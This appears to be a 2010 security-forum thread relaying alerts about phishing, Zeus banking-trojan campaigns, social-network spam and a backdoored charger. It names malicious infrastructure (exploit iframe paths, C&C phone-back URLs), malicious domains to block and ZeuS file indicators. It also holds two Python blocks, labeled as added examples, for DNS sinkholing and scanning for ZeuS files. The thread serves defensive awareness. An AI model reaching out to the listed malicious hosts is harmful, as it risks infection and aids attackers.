February 8, 2010 - "... be aware of e-mails purportedly from Gmail administrators. One of our Fellows recently received a message from "The Google Mail Team" asking users to verify their account details to combat "anonymous registration of accounts"... The reply-to address is listed as 'verifyscecssze@gmail.com', which obviously isn't an official Gmail admin account. Meanwhile, the domain name gmeadmailcenter .com is registered to a Catholic church in Michigan. Just your typical phishing type message really. Gmail users who receive this e-mail can report it to the (real) Gmail team using the 'Report phishing' option in their account, or just delete it."
More phishing notes today (Screenshots provided at both URLs below):
- http://blog.trendmicro.com/phishing-pages-pose-as-secure-login-pages/
Feb. 8, 2010
- http://blog.trendmicro.com/caisse-d%e2%80%99epargne-customers-beware/
Feb. 8, 2010
:fear::mad:
AplusWebMaster
2010-02-08, 21:49
FYI...
Zeus Campaign Targeted Government Departments
- http://securitylabs.websense.com/content/Alerts/3546.aspx?cmpid=slalert
02.08.2010 - "Websense... has discovered a new Zeus campaign (a banking data stealing Trojan) which is now targeting government departments. Our research shows that the campaign has especially targeted workers from government and military departments in the UK and US: we found most victims' email addresses end with .gov... thousands of emails which pretend to be from the National Intelligence Council. The email subjects include:
"National Intelligence Council"
"RE: National Intelligence Council"
"Report of the National Intelligence Council"
The spoofed emails lure victims to download a document about the "2020 project"; this is actually a Zeus bot. The Web sites which host the bot look very trustworthy: one of them is a compromised organization Web site and the other is located on a popular file hosting service. The bot has rootkit capabilities and connects to C&C servers at update*snip* .com and pack*snip* .com to report back on a successful infection and to download some archives with DLLs, it also modifies the hosts file to prevent updates from popular anti-virus vendors... the anti-virus detection rate for this bot is currently at 26/40*."
* http://www.virustotal.com/analisis/82d10922cc1365a79b43a16502211ae610f56b01cd36a18db67d8a0c81c434c4-1265615954
File 2020.exe_ received on 2010.02.08 07:59:14 (UTC)
Result: 26/40 (65.00%)
(Screenshots available at the Websense URL above.)
- http://www.krebsonsecurity.com/2010/02/zeus-attack-spoofs-nsa-targets-gov-and-mil/
February 6, 2010 - "... The scam e-mails may seem legitimate because the name of the booby-trapped file mimics a legitimate 2020 Project report*** published by the NIC, which has a stated goal of providing US policymakers “with a view of how the world developments could evolve, identifying opportunities and potentially negative developments that might warrant policy action.” Only 16 of the 39 anti-virus scanners used by Virustotal.com detect the file** as malicious, and those that do mostly label it as a variant of the Zeus/Zbot Trojan..."
** http://www.virustotal.com/analisis/3c1d8359112caf87b33a4d6fedef2f2dbdf03d5d7c0d7f00883afcb6a7e2f610-1265331501
File 2020.zip.txt received on 2010.02.05 00:58:21 (UTC)
Result: 16/39 (41.03%)
*** http://www.dni.gov/nic/NIC_2020_project.html
- http://www.threatexpert.com/report.aspx?md5=3cfc97f88e7b24d3ceecd4ba7054e138
7 February 2010
- http://www.m86security.com/labs/i/Inside-a-Pushdo-Zeus-Campaign,trace.1233~.asp
February 7, 2010 M86 Security - "... another Zeus campaign that we observed last week..."
:fear::mad:
AplusWebMaster
2010-02-11, 20:37
FYI...
Zeus targeted attacks continue
- http://securitylabs.websense.com/content/Alerts/3550.aspx?
02.11.2010 - "Websense... has discovered a follow-up attack on the Zeus campaign targeting government departments. Its research shows that once again the campaign is targeting workers from government and military departments globally... The Websense ThreatSeeker Network has seen thousands of emails pretending to be from a reputable figure within the Central Intelligence Agency... The email subject is:
"Russian spear phishing attack against .mil and .gov employees"...
The spoofed emails capitalize on the last Zeus attack, and claim that installing the Windows update via the links provided will aid protection against Zeus attacks. The binary file downloaded from these links is identified as a Zeus bot and holds a 35% AV detection rate*. Once again URLs in the email messages lead to a malicious file hosted on a compromised host, and also on a popular file hosting service. Once installed, the bot has identical functionality to the one mentioned in the previous alert. After the Zeus rootkit component is installed the C&C server at update[removed].com is contacted to download an encrypted configuration file. Another data stealing component gets downloaded and installed from the same C&C in the shape of a Win32 Perl script compiled with Perl2Exe - this data-stealing component has only a 5% AV detection rate**. Then the bot starts to connect with a credential-based FTP server at pack[removed].com to upload stolen data. The Zeus bot is normally designed to steal banking credentials; however it has also been seen in targeted attacks to steal other sensitive data..."
* http://www.virustotal.com/analisis/696196fcc2d7803a0ebc4bdca53f03c9e1e55b15669658f9218d246d49e8c476-1265856371
File KB823988.exe received on 2010.02.11 02:46:11 (UTC)
Result: 14/41 (34.15%)
** http://www.virustotal.com/analisis/1336bca82ba370c8cf0967ed192cb1865e4f943fbb4ea4e2f6c2c9b98eb43723-1265905508
File stat.exe received on 2010.02.11 16:25:08 (UTC)
Result: 2/41 (4.88%)
(Screenshots available at the Websense URL above.)
:fear::mad::fear:
AplusWebMaster
2010-02-12, 01:40
FYI...
Spammers already using Google Buzz
- http://securitylabs.websense.com/content/Alerts/3551.aspx?
02.11.2010 - "... Today we saw the first spam using Google Buzz to spread a message about smoking... The spammer is already following 237 people, and we can only imagine that he or she has sent similar messages to all of them. This particular message leads to a site hosted on a free Web hosting service talking about how to quit smoking. When Twitter was launched, it took a while before it was used to send spam and other malicious messages. In this case, it only took two days. It's clear that the bad guys have learned from their experience using social networks to distribute these types of messages. We hope that Google is geared up for dealing with the volume of spam it's bound to see on the new service. Until then, we advise users to be careful, as usual, when clicking on unknown links."
(Screenshot available at the URL above.)
The Buzz is getting LOUDER
- http://www.sophos.com/blogs/sophoslabs/post/8641
February 11, 2010
- http://www.eset.com/threat-center/blog/2010/02/12/is-gmail-spyware
February 12, 2010 - "... If you have a Gmail account and don’t want to broadcast to the world who you chat with and email the most, then when you log into Gmail, immediately scroll to the bottom of the page and turn off Buzz..."
:fear::fear:
AplusWebMaster
2010-02-12, 16:25
FYI...
Dear taxpayer – don’t
- http://sunbeltblog.blogspot.com/2010/02/dear-taxpayer-dont.html?
February 11, 2010 - "‘Tis the season for Zbot spam."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2010-02-16, 05:35
FYI...
IRS themed Zeus exploits...
- http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html
February 15, 2010 - "As anticipated, the botnet masters behind the systematically rotated campaigns dissected in previous posts, kick off the week with multiple campaigns parked on the newly introduced fast-fluxed domains. In a typical multitasking fashion, two campaigns are currently active on different sub domains introduced at the typosquatted fast-flux ones, impersonating the U.S. IRS with "Unreported/Underreported Income (Fraud Application) theme", as well as a variation of the already profiled PhotoArchive campaign, using a well known "You don't have the latest version of Macromedia Flash Player" error message... researchers from M86 Security* gained access to the web malware exploitation kit..."
(More detail at the URL above.)
* http://www.m86security.com/trace/traceitem.asp?article=1233
February 7, 2010 - "... It has been up and running and serving exploits for nearly a day. In this time almost 40,000 unique users have been exposed to these exploits, and the Zeus file has been downloaded over 5000 times..."
:fear::mad:
AplusWebMaster
2010-02-16, 18:44
FYI...
The Wizard of Buzz
- http://securitylabs.websense.com/content/Blogs/3553.aspx
02.16.2010 - "Buzz is just a new wizard in the kingdom of Google. However, it is not hard to foresee through the crystal ball that Dorothy's journey along the yellow brick road will be full of constant attacks from the Witch of malware and her spamming monkeys. The biggest problem with Google Buzz is privacy. You can read lots of blogs and articles on this already, and this blog does not intend to examine this subject. It's enough to know that with Buzz, it is too easy to follow and read other people's messages... What is worrying for us is that it's now much easier to spread spam and malicious messages than before, thanks to this super-network. Google has reacted to these issues quickly and has changed the default settings of its social network. Unfortunately there is no change for existing users, so if you have already subscribed, you still need to tweak the settings for yourself to make it secure..."
- http://www.eset.com/threat-center/blog/2010/02/12/is-gmail-spyware
February 12, 2010 - "... If you have a Gmail account and don’t want to broadcast to the world who you chat with and email the most, then when you log into Gmail, immediately scroll to the bottom of the page and turn off Buzz..."
- http://www.pcworld.com/article/189388/why_google_has_become_microsofts_evil_twin.html
- http://www.f-secure.com/weblog/archives/00001886.html
February 18, 2010 - "... You don't get to use free services and expect to get absolute privacy. Either you offer up some of your information for enhanced services, or you don't. Remember, Google isn't your friend. It's a business..."
:fear:
AplusWebMaster
2010-02-19, 15:57
FYI...
Symantec ThreatCon...
- http://www.changedetection.com/log/symantec/threatconlearn_log.html
... changes: 2010-02-19 05:28 "... Symantec is aware of several reports of a strain of Zeus dubbed 'Kneber'. The Zeus exploit toolkit is often used in campaigns that have no specific target. The goal is often to infect as many systems as possible. This strain is reported to harvest personal information from the victim that attackers can use for financial gain. Customers are advised to ensure that antivirus products are up to date. Symantec detects this threat as Trojan.Zbot.
Trojan.Zbot
http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2010-011016-3514-99
Zeus Toolkits...
> http://www.symantec.com/connect/blogs/zeus-king-underground-crimeware-toolkits
August 25, 2009
- http://blog.threatfire.com/2010/02/a-zbot-botnet-dubbed-kneber.html
February 18, 2010
- http://www.netwitness.com/resources/pressreleases/feb182010.aspx
February 18, 2010
- http://www.f-secure.com/weblog/archives/00001887.html
February 19, 2010
- http://www.krebsonsecurity.com/2010/02/zeus-a-virus-known-as-botnet/
February 19, 2010
:fear:
AplusWebMaster
2010-02-21, 02:23
FYI...
Zeus exploit svr morphs in the Wild...
- http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html
UPDATED: Saturday, February 20, 2010 - "The client-side exploit serving iFrame directory has been changed to 91.201.196.101 /usasp11/in.php, with another typosquatted portfolio of domains currently being spamvertised.
Detection rates: update.exe - Trojan.Zbot - Result: 25/40 (62.5%) (phones back to trollar.ru /cnf/trl.jpg - 109.95.114.133 - Email: bernardo_pr @inbox .ru ); file.exe - Trojan.Spy.ZBot.12544.1 - Result: 26/41 (63.42%); ie.js - JS:CVE-2008-0015-G - Result: 14/40 (35%); ie2.js - Exploit:JS/CVE-2008-0015 - Result: 17/40 (42.5%); nowTrue.swf - Trojan.SWF.Dropper.E - Result: 24/41 (58.54%); pdf.pdf - Exploit.JS.Pdfka.bln - Result: 11/41 (26.83%); swf.swf - SWF/Exploit.Agent.BS - Result: 8/40 (20%)..."
(More detail at the ddanchev URL above.)
:fear::mad:
AplusWebMaster
2010-02-25, 00:46
FYI...
New Twitter Worm making the rounds
- http://blog.trendmicro.com/twitter-worm/
Feb. 24, 2010 - "A new Twitter worm is making the rounds. If you receive a direct message from a “friend” that contains the following message:
“This you????”
It is likely malicious. Clicking the link, http: //twitter.login.{BLOCKED}home.org/login/, will -redirect- you to a sub page of the said domain. You will then be prompted to log in to your Twitter account... Once you log in, your credentials will be stolen and all of your followers will receive a direct message from you with a link to the same site, allowing the worm to further propagate. Doubtlessly, at some point in the future, the cybercriminals behind this attack will use the same stolen credentials to send out other malicious content from a huge number of compromised Twitter accounts. So remember, think before you click!..."
(Screenshots available at the URL above.)
- http://www.f-secure.com/weblog/archives/00001893.html
February 25, 2010 - "... phrases such as "This you??" or "LOL is this you" are linking victims towards a Twitter login phishing page. If the bait is taken and the victim enters their password, Twitter's infamous "fail whale" is displayed and the user is returned to their account. They might not even realize that their account details have been compromised..."
- http://sunbeltblog.blogspot.com/2010/02/twitter-search-is-finding-rogues-thanks.html
February 25, 2010
:fear::mad:
AplusWebMaster
2010-02-25, 13:53
FYI...
More-Zeus-client-side-exploits-serving-iFrame ...in the Wild...
- http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html
SECOND UPDATE for Wednesday, February 24, 2010 - Another portfolio of new domains is being spamvertised, using the old PhotoArchive theme. The client-side exploits serving iFrame directory has been changed to 91.201.196.101 /usasp33/in.php currently serving CVE-2007-5659; CVE-2008-2992; CVE-2008-0015; CVE-2009-0927 and CVE-2009-4324.
Sample detection rates: update.exe - Trojan-Spy.Win32.Zbot.gen - Result: 10/42 (23.81%); file.exe - Trojan-Spy.Win32.Zbot.gen - Result: 10/42 (23.81%). Samples phone back to the same C&C where samples from previous campaigns were also phoning back to - trollar.ru /cnf/trl.jpg..."
(More detail at the URL above.)
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5659
"... Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2992
"... Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0015
"... MS09-032... MS09-037..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0927
"... Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4324
"... Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code..."
- http://blog.trendmicro.com/whats-the-juice-on-zeus/
Mar. 4, 2010 - "... ZeuS has been entrenched in the cybercriminal business for a long time now and has continuously evolved and improved. Given the vast number of toolkit versions readily available in the underground, the features ZeuS possesses to thwart both antivirus and other security solutions, as well as efforts by the security industry, ZeuS will continue to be used by cybercriminals to steal personal information and even people’s identities..."
:mad::fear::mad:
AplusWebMaster
2010-02-27, 04:16
FYI...
Rogue Facebook app propagates via users
- http://securitylabs.websense.com/content/Blogs/3563.aspx
02.26.2010 - "The latest scam targeted at Facebook users hit the public today. The rogue app, which comes in many variants of "Who is checking your profile?", has improved its technique beyond the previous attacks we've seen. Rather than spreading a single app that Facebook can easily block, it tricks users into propagating the exploit by creating a brand new Facebook application that hands over the controls to the bad guys. The attack starts with a friend, whom you trust, posting a link on your wall, asking you who is checking your profile. It also entices you by telling you that your friend is viewing your profile. The draw itself has been around for a long time, and the idea of being able to tell which users have looked at your profile is an attractive proposition. But Facebook policy and the API itself prevent this capability, which means that all applications that promise this feature are bogus... The most important thing for Facebook users to remember is that clicking “Allow” authorizes an application, and by doing so you are giving it the proverbial “keys to the kingdom.” Do not add any applications that you do not trust..."
(More detail and screenshots at the Websense URL above.)
:fear::mad:
AplusWebMaster
2010-03-01, 03:56
FYI...
Blackhat SEO PDF - Chile and Hawaii disasters
- http://securitylabs.websense.com/content/Alerts/3568.aspx?
02.28.2010 - "Over 13% of all searches on Google* looking for popular and trending topics will lead to malicious links and searching for the latest news on the earthquake in Chile and the tsunami hitting Hawaii are no exception. Both are now used to lure people into downloading fake antivirus products. Usually the links in the search results look like ordinary links pointing to regular web pages. This time the bad guys have changed tactics to make their search results look even more convincing, by tricking Google into thinking it's a PDF file... Google tells you the file format is PDF and not HTML. That's not true, it is in fact a regular HTML page that when visited will redirect the user to a page that looks like this - just another rogue AV fake scanning page. This one, just like the majority of rogue AV sites we have seen this week, is in the .IN TLD which is the top-level domain for India. By making the search result look like a PDF it gives the link more authenticity. Perhaps it's a research paper or at least a more well written article. The likelihood that a user will click on these types of links is probably higher than if it were just another random web link... The Rogue AV file itself is currently detected by 26.20%** of the antivirus engines used by VirusTotal..."
* http://preview.tinyurl.com/yzv4nze
(Screenshots available at the Websense URL above.)
** http://www.virustotal.com/analisis/fabca4efdaf5c89d36e153637fbe92bc130f62812d6261833b073a23240260c8-1267321093
File packupdate_build6_287.exe received on 2010.02.28 01:38:13 (UTC)
Result: 11/41 (26.83%)
:fear::mad:
AplusWebMaster
2010-03-02, 20:31
FYI...
New Domains - fastflux, rogue, koobface...
- http://www.malwaredomains.com/wordpress/?p=859
March 1st, 2010 - "Upload was delayed by a few days due to weather issues from the latest storm..."
- http://www.malwaredomains.com/wordpress/?page_id=2
"The DNS-BH project creates and maintains a listing of domains that are known to be used to propagate malware and spyware... available in AdBlock and ISA Format..."
:fear:
AplusWebMaster
2010-03-02, 22:25
FYI...
ESET statistics on infections
- http://www.eset.com/threat-center/blog/2010/03/02/more-statistics-on-infections
March 2, 2010 - "... the statistics we are seeing through our online scanner logs are consistent with our observation from last September. We are seeing an average of 3 different malware families per infected computer. This means that on average, when a computer is infected, we find three different malware families installed on it... The average of different malware families per infected hosts in the United States is close to the global average. On the other hand, this number reaches 4.5 in China where it has one of the highest values. This indicates that malware operations are not conducted the same way around the world. We usually see fewer bank information stealers in Asia but more online game password stealers. Online game password stealers are usually installed by other malware families and don’t propagate by themselves, explaining why we see a higher average in China than in the United States. On a daily basis, ESET is collecting more than 200,000 new and unique binary malicious files..."
___
... which translates to over 73 million new malware items for 2010, a record rate by any standard.
:fear:
AplusWebMaster
2010-03-05, 09:03
FYI...
Huge update: malicious advertising domains...
- http://www.malwaredomains.com/wordpress/?p=870
March 5, 2010 - "We are adding the malicious domains being served up at ad banner networks based on the listings at malwaredomainlist and trojaned binaries. Most of these malicious ad banners serve up fake antivirus scareware. There are also few phishing and zeus domains in this update..."
- http://www.malwaredomains.com/wordpress/?p=864
March 4, 2010 - "From SANS*: Block google-analitics (dot) net and salefale (dot) com ASAP. Sites will be added on the next update..."
* http://isc.sans.org/diary.html?storyid=8350
- http://www.malwaredomains.com/wordpress/?page_id=2
"The DNS-BH project creates and maintains a listing of domains that are known to be used to propagate malware and spyware. This project creates the Bind and Windows zone files required to serve fake replies to localhost for any requests to these, thus preventing many spyware installs and reporting. This list is also available in AdBlock and ISA Format..."
:fear::fear:
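The DNS-BH description above (zone files that answer listed domains with localhost) is easy to reproduce for a list of your own. The block below is an added example, not the DNS-BH project's own code: it takes a one-domain-per-line list (the format and the `#` comment convention are assumed), normalizes and validates the entries, and emits both a BIND `named.conf` fragment that points every listed domain at a single sinkhole zone file and a hosts-file rendering of the same list. The zone file path `/etc/namedb/blockeddomain.hosts` and the sample list are constructed placeholders; the two domains in the sample are the ones quoted from the SANS diary above.

```python
import re
from typing import Iterable, List

# Assumed location of the shared sinkhole zone file; adjust to your BIND layout.
BLACKHOLE_ZONE_FILE = "/etc/namedb/blockeddomain.hosts"
# Answer every listed domain with loopback so the request never leaves the host.
SINKHOLE_IP = "127.0.0.1"

# One DNS label: alphanumerics and hyphens, no leading/trailing hyphen, max 63 chars.
_LABEL = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def is_valid_domain(name: str) -> bool:
    """Reject entries that would produce a broken zone clause (spaces, single labels, bad chars)."""
    labels = name.split(".")
    if len(labels) < 2 or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in labels)


def parse_domain_list(text: str) -> List[str]:
    """Parse a DNS-BH style list: one domain per line, '#' starts a comment.

    Entries are lower-cased, trailing dots are stripped, duplicates and invalid
    names are dropped, and the result is sorted so generated configs are stable.
    """
    seen = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip().lower().rstrip(".")
        if line and is_valid_domain(line):
            seen.add(line)
    return sorted(seen)


def bind_zone_config(domains: Iterable[str], zone_file: str = BLACKHOLE_ZONE_FILE) -> str:
    """Render named.conf 'zone' clauses that make BIND authoritative for each listed domain."""
    lines = ["// Generated blackhole zones: every listed domain is served from the sinkhole zone file."]
    for domain in domains:
        lines.append(f'zone "{domain}" {{ type master; file "{zone_file}"; }};')
    return "\n".join(lines) + "\n"


def blackhole_zone_file(serial: int, ttl: int = 3600) -> str:
    """Render the single sinkhole zone: apex and wildcard both resolve to SINKHOLE_IP."""
    return (
        f"$TTL {ttl}\n"
        "@ IN SOA localhost. root.localhost. (\n"
        f"    {serial} ; serial\n"
        "    3600 ; refresh\n"
        "    900 ; retry\n"
        "    604800 ; expire\n"
        f"    {ttl} ) ; minimum\n"
        "@ IN NS localhost.\n"
        f"@ IN A {SINKHOLE_IP}\n"
        f"* IN A {SINKHOLE_IP}\n"
    )


def hosts_file_entries(domains: Iterable[str]) -> str:
    """Render the same list as hosts-file lines for systems without a local resolver."""
    return "".join(f"{SINKHOLE_IP} {domain}\n" for domain in domains)


# Constructed sample list in the one-domain-per-line style (the two names come from the SANS diary quoted above).
SAMPLE_LIST = """# constructed sample block list
google-analitics.net      # from the SANS diary
SALEFALE.COM.             # mixed case and trailing dot are normalized
google-analitics.net      # duplicate is collapsed
not a domain              # invalid entry is dropped
"""

if __name__ == "__main__":
    domains = parse_domain_list(SAMPLE_LIST)
    print(bind_zone_config(domains))
    print(blackhole_zone_file(serial=2010030501))
    print(hosts_file_entries(domains))
```

Load the generated fragment with an `include` in `named.conf`, and bump the serial in the sinkhole zone whenever the shared file changes; the wildcard record is what makes subdomains of a listed name sink as well.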
AplusWebMaster
2010-03-08, 18:52
FYI...
Energizer DUO USB Battery Charger Software Allows Remote System Access
- http://www.us-cert.gov/current/#engergizer_duo_usb_battery_charger
March 8, 2010 - "US-CERT is aware of a backdoor in the software for the Energizer DUO USB battery charger. This backdoor may allow a remote attacker to list directories, send and receive files, and execute programs on an affected system... US-CERT encourages users and administrators to review Vulnerability Note VU#154421* and apply the recommended solutions."
* http://www.kb.cert.org/vuls/id/154421
- http://www.symantec.com/connect/blogs/back-door-found-energizer-duo-usb-battery-charger-software
March 5, 2010
- http://secunia.com/advisories/38894/
Release Date: 2010-03-08
Criticality level: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Solution: Uninstall the software and remove "Arucer.dll" from the Windows system32 directory.
Original Advisory: VU#154421:
http://www.kb.cert.org/vuls/id/154421
- http://phx.corporate-ir.net/phoenix.zhtml?c=124138&p=irol-newsArticle_print&ID=1399675&highlight=
March 5, 2010 - "... Energizer has discontinued sale of this product and has removed the site to download the software..."
:fear::mad:
AplusWebMaster
2010-03-09, 12:11
FYI...
Hacks steal $120M+ in 3 months: FDIC
- http://www.computerworld.com/s/article/9167598/FDIC_Hackers_took_more_than_120M_in_three_months?
March 8, 2010 - "Ongoing computer scams targeting small businesses cost U.S. companies $25 million in the third quarter of 2009, according to the (FDIC). Online banking fraud involving the electronic transfer of funds has been on the rise since 2007 and rose to over $120 million in the third quarter of 2009, according to estimates presented Friday at the RSA Conference in San Francisco, by David Nelson, an examination specialist with the FDIC. The FDIC receives a variety of confidential reports from financial institutions, which allow it to generate the estimates, Nelson said. Almost all of the incidents reported to the FDIC "related to malware on online banking customers' PCs," he said. Typically a victim is tricked into visiting a malicious Web site or downloading a Trojan horse program that gives hackers access to their banking passwords. Money is then transferred out of the account using the Automated Clearing House (ACH) system that banks use to process payments between institutions. Even though banks now force customers to use several forms of authentication, hackers are still stealing money. "Online banking customers are getting too reliant on authentication and on practicing layers of controls," Nelson said... Commercial deposit accounts do not receive the reimbursement protection that consumer accounts have, so a lot of small businesses and nonprofits have suffered some relatively large losses," Nelson said. "In the third quarter of 2009, small businesses suffered $25 million in losses due to online ACH and wire transfer fraud." That's led to some nasty legal disputes, where customers say the banks should have stopped payments, and the banks argue that the customers should have protected their own computers from infection. Often small businesses do not have the controls in place to prevent unauthorized ACH payments, even when their banks make them available, Nelson said. 
"Hackers are definitely targeting higher-balance accounts and they're looking for small businesses where controls might not be very good." The FDIC's estimates are "reasonable," but they illustrate a problem that is becoming too expensive for banks and businesses, said Avivah Litan, an analyst with Gartner. She said that attacks that install a password-stealing botnet program, known as Zeus, have increased so far in 2010, so those losses may be even higher this year."
:fear::mad:
AplusWebMaster
2010-03-11, 20:49
FYI...
iPad giveaway gives users identities away
- http://blog.trendmicro.com/ipad-giveaway-gives-users%E2%80%99-identities-away/
Mar 9, 2010 - "... spammed messages that promise free iPads to lure unwitting users into their scams. In one such spam sample, recipients are being invited to test the iPad at no cost by simply applying to be part of a “word-of-mouth” marketing campaign. They may not have to shell out a single cent but the price they have to pay will be their identities... The spammed messages instruct users to reply to the email with their personal information, which spammers could easily use for further malicious activities... This recent spam run is no different from how cybercriminals leveraged the iPad launch in January, which led to a FAKEAV variant. Users should thus continue exercising caution in opening email messages from unknown senders. It is also important to be cautious in conducting Web searches on hot topics such as the iPad, as these are often used for blackhat search engine optimization (SEO) attacks... Apple does not own any iPad-related domain names so users should really pay close attention to URLs before they click."
(Screenshots available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2010-03-13, 14:31
FYI...
IC3 2009 Internet Crime Annual Report
- http://www.ic3.gov/media/2010/100312.aspx
March 12, 2010 - "... Online crime complaints increased substantially once again last year, according to the report. The IC3 received a total of 336,655 complaints, a 22.3 percent increase from 2008. The total loss linked to online fraud was $559.7 million; this is up from $265 million in 2008... Although the complaints consisted of a variety of fraud types, advanced fee scams that fraudulently used the FBI's name ranked number one (16.6 percent). Non-delivery of merchandise and/or payment was the second most reported offense (11.9 percent)... The report is posted in its entirety on the IC3 website*. The Internet Crime Complaint Center (IC3) is a joint operation between the FBI and the National White Collar Crime Center (NW3C). IC3 receives, develops, and refers criminal complaints regarding the rapidly expanding arena of cyber crime. The IC3 gives the victims of cyber crime a convenient and easy-to-use reporting mechanism utilized to alert authorities of suspected criminal or civil violations..."
* http://www.ic3.gov/media/annualreports.aspx
[ Replace the word “complaints” with “citizen-reported-criminal-activity”… ‘do same in the actual report itself. ]
- http://www.eset.com/blog/2010/03/17/were-not-talking-peanuts-here
March 17, 2010 - "... these figures relate only to the USA. Multiply those amounts many times over to give you some idea of the size of the losses on a global basis. The amount of money that is lost to global cybercrime activities is massive... because the size of the problem is often not understood, it seems to slip under the radar and often isn’t even considered a serious problem... The drug trade problem has plenty of awareness in the public eye and plenty of focus from law enforcement. Yet in fact the global cybercrime trade makes more money these days than the global drug trade..."
:fear::mad::fear:
AplusWebMaster
2010-03-14, 18:28
FYI...
ZeuS detection on your PC...
- http://www.secureworks.com/research/threats/zeus/
March 11, 2010 - "... How to detect the ZeuS Banking Trojan on your computer
Computers infected with this version of ZeuS will have the following files and folders installed. The location depends on whether the victim has Administrator rights. The files will most likely have the HIDDEN attribute set to hide them from casual inspection...
sdra64.exe (malware)
user.ds (encrypted stolen data file)
user.ds.lll (temporary file for stolen data)
local.ds (encrypted configuration file)
The sdra64.exe program uses process injection to hide its presence in the list of running processes. Upon startup, it will inject code into winlogon.exe (if Administrator rights available) or explorer.exe (for non-Administrators) and exit. The injected code infects other processes to perform its data theft capabilities..."
(More detail available at the URL above.)
:mad::mad:
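A defender-side check for the file names quoted above, added here as an example (not code from the post or from SecureWorks): it walks a directory tree, matches the names case-insensitively and reports whether each hit carries the HIDDEN attribute. The sample tree in demo() is constructed; the scan root and the ZeuS install locations are whatever the SecureWorks write-up gives for your case.

```python
"""Added example (not from the post or SecureWorks): walk a directory tree for the
ZeuS file names quoted above and report whether each hit is marked hidden."""
import os
import shutil
import tempfile
from pathlib import Path

# File names quoted in the SecureWorks excerpt; matched case-insensitively.
ZEUS_FILENAMES = {"sdra64.exe", "user.ds", "user.ds.lll", "local.ds"}

# Windows FILE_ATTRIBUTE_HIDDEN bit as exposed in os.stat().st_file_attributes.
FILE_ATTRIBUTE_HIDDEN = 0x2


def is_hidden(path: Path) -> bool:
    """True if the file carries the Windows HIDDEN attribute (dot-name on POSIX)."""
    try:
        st = path.stat()
    except OSError:
        return False
    attrs = getattr(st, "st_file_attributes", None)  # only present on Windows
    if attrs is not None:
        return bool(attrs & FILE_ATTRIBUTE_HIDDEN)
    return path.name.startswith(".")


def scan_for_zeus_files(root, names=ZEUS_FILENAMES):
    """Return a sorted list of (path, hidden) for every file under `root` whose
    name matches one of `names`. Directories that cannot be read are skipped."""
    wanted = {n.lower() for n in names}
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for fn in files:
            if fn.lower() in wanted:
                p = Path(dirpath) / fn
                hits.append((str(p), is_hidden(p)))
    return sorted(hits)


def demo():
    """Constructed sample tree: two indicator names (one upper-case) and a benign
    file. Returns the base names of the hits so the result is easy to check."""
    root = tempfile.mkdtemp(prefix="zeus_scan_")
    try:
        sub = os.path.join(root, "sub")
        os.makedirs(sub)
        for name in ("SDRA64.EXE", "local.ds", "notes.txt"):
            open(os.path.join(sub, name), "w").close()
        return [os.path.basename(p) for p, _hidden in scan_for_zeus_files(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    # Real use: scan_for_zeus_files(r"C:\Windows\System32") or a user profile.
    print(demo())
```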
AplusWebMaster
2010-03-18, 00:08
FYI...
Online stock trading is risky
- http://www.f-secure.com/weblog/archives/00001909.html
March 17, 2010 - "Buying and selling stock online is big business. It also carries its own risks. And we don't mean the risk of doing bad investments; we mean losing access to your trading account because your computer got infected by a keylogger. Take a case of Mr. Valery Maltsev from St. Petersburg. Maltsev runs an investment company called Broco Investments... Unfortunately (to him), Maltsev was yesterday charged by US Securities & Exchange commission. They claim that Maltsev's extraordinary gains in thinly traded NASDAQ and NYSE stocks were not a co-incidence. Apparently Maltsev used malware with keyloggers to gain access to other people's online trading accounts. With such accounts, he could buy stocks at inflated prices, and use his real account to sell the same stock, for instant gains. Quoting from the SEC Complaint:
On December 21, 2009, at 13:37, BroCo bought shares of Ameriserv Financial, Inc (ASRV) at a price of $1.51 per share. Approximately one minute later, three accounts at Scottrade were illegally accessed and used to purchase shares of ASRV at prices ranging from $1.545 to $1.828 per share. While this was happening, BroCo sold shares of ASRV at prices ranging from $1.70 to $1.80 per share, finishing at 13:52. By trading shares of ASRV within minutes of unauthorized trading through the compromised accounts, Maltsev and BroCo grossed $141,500 in approximately fifteen minutes, realizing a net profit of $17,760 ..."
- http://www.theregister.co.uk/2010/03/16/pump_and_dump_hacking/
16 March 2010 - "... The scheme earned at least $255,532 from August to December at a cost of $603,000 to broker-dealers, which had to reimburse customers... The lawsuit seeks an order freezing the Genesis accounts and requiring Maltsev to repay the lost funds..."
:eek::mad:
AplusWebMaster
2010-03-18, 16:08
FYI...
Battery recharger software trojan - more...
- http://www.theregister.co.uk/2010/03/18/energizer_battery_trojan_returns/
